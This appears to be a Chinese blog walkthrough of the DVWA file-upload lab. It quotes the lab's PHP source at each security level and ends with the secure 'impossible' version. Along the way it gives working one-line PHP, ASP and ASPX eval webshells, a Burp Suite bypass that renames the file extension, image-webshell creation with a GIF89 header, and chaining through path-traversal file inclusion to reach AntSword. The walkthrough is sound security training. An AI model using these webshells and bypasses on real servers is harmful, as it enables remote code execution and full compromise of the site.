一、文件上传(FIle Upload)
1.定义
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,导致用户可以提交修改过后的数据(一般为webshell),则会导致严重的后果。
low
源码分析
全局数组*$_FILES*用来获取通过 POST 方法上传文件信息。
basename(str,name)
函数返回路径中的文件名部分,如果可选参数name为空,则返回的文件名包含后缀名,反之不包含后缀名。
move_uploaded_file函数将上传的文件保存到新位置
对源码分析可以看到,服务器对上传文件的类型、内容没有做任何的检查、过滤,存在明显的文件上传漏洞,生成上传路径后,服务器会检查是否上传成功并返回相应提示信息。文件上传没有做任何限制,可以上传任何文件,在上传一句话木马,然后通过蚁剑或者中国菜刀拿到webshell。
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>
新建一个txt文件写入一句话木马 **<?php @eval($_POST['key']);?>**key值可以随意改变,菜刀蚁剑上传时填写密码需要。
常见木马如下
@
表示后面即使执行错误,也不报错。
eval()
函数表示括号内的语句字符串什么的全都当做代码执行。
$_POST['key']
表示从页面中获得key这个参数值,即该木马密码为key。
PHP一句话木马:<?php @eval($_POST['key']);?>
ASP一句话木马:<%eval request['key']%>
ASPX一句话木马:<%@ Page Language="Jscript"%><%eval(Request.Item["key"],"unsafe");%>
txt文本编辑完改后缀文件名为.php
点击浏览到我们创建的php文件进行upload上传。
复制链接到顶部url
回车进入带有php文件中,空白无页面代表没有报错,上传木马成功。
进入蚁剑,进行连接,输入带有php木马网页的url,密码就是写木马的 key,我的是wjsc
点击连接,蚁剑会通过向服务器发送包含wjsc参数的post请求,在服务器上执行任意命令,获取webshell权限,进入网站后台,就可以下载、修改服务器的所有文件。
medium
源码分析
发现对上传的文件类型和大小做了限制,文件类型必须为image/jpeg和image/png,且文件大小要小于100000b。
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
那我们上传php文件,肯定是上传不了,报错的。
**bp抓包 **
将上一步中的php文件换个名字 后缀改成.png,上传.png文件。
用burpsuite抓包,将抓到的报文右键send to repeater。
将文件后缀由png改为php,send一下。
点击forward放包,我们发现wjsc1.php显示上传成功。
验证一下,我们查看一下上传的目录
蚁剑连接一下
High
源码分析
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
我们可以看到读取了文件的后缀名,然后判断文件后缀名是否为jpg,jpeg,png,还使用getimagesize函数来获取图片信息。
函数 getimagesize() 可以获取图片的宽、高信息,如果上传的不是图片,那么该函数就获取不到信息,导致上传失败。
木马图片
一句话木马a.txt文件加1.jpg图片生成带木马的jpg图片。
cmd打开输入
copy 1.jpg/b+wjsc.php 2.jpg
//复制 原图片/b+木马.php 新图片
copy 11.jpg/b+1.php/a 11.jpg
//b表示二进制文件、a表示ASCII码文件
或者这样写一定要加上GIF89图片头文件欺骗,不写上传不上。
开始上传
这时只是上传成功,但是蚁剑是连不上的,因为不是php文件。无法解析运行,所以图片木马上传后,不能触发,需要结合其他漏洞一起利用。结合文件包含漏洞一起利用。
结合文件包含的low级别(可进行远程)
进入文件包含,在url的后面page=输入../../hackable/uploads/w.jpg
蚁剑的url输入
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/w.jpg
发现为空,可能需要登录,搞一下Cookie试试,可bp抓包,可cookie插件。
cookie插件
连接成功
**文件包含high **
输入url弹出来文件内容GIF89,后面的木马php已经执行成功了。
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=file://D:\Users\phpstudy_pro\WWW\DVWA\hackable\uploads\w.jpg
上蚁剑,测试发现为空,
可能需要登录,添加cookie头试试,bp抓包也行,浏览器Cookie Editor插件也可,都能获取到Cookie。
把Cookie值填写到蚁剑里面。
** 连接成功**
Impossible
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
//$target_file = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
$target_file = md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
$temp_file = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
$temp_file .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
// Is it an image?
if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
( $uploaded_size < 100000 ) &&
( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
getimagesize( $uploaded_tmp ) ) {
// Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
if( $uploaded_type == 'image/jpeg' ) {
$img = imagecreatefromjpeg( $uploaded_tmp );
imagejpeg( $img, $temp_file, 100);
}
else {
$img = imagecreatefrompng( $uploaded_tmp );
imagepng( $img, $temp_file, 9);
}
imagedestroy( $img );
// Can we move the file to the web root from the temp folder?
if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
// Yes!
echo "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>";
}
else {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
// Delete any temp files
if( file_exists( $temp_file ) )
unlink( $temp_file );
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
主要函数:
(1)uniqid函数基于以微秒计的当前时间,生成一个唯一的 ID
(2)md5函数计算字符串的 MD5 散列。
(3)ini_get函数获取php.ini里变量值
(4)sys_get_temp_dir函数返回 PHP 储存临时文件的默认目录的路径
(5)imagecreatefromjpeg函数以及imagecreatefrompng函数由文件或 URL 创建一个新图象
(6)imagejpeg函数以及imagepng函数输出图象到浏览器或文件
(7)getchwd函数返回当前工作目录
(8)rename函数重命名文件或目录
文件名有md5加密,且图片为重新创建的,图片木马无法成功,无漏洞可利用 。
版权归原作者 橙子学不会. 所有, 如有侵权,请联系我们删除。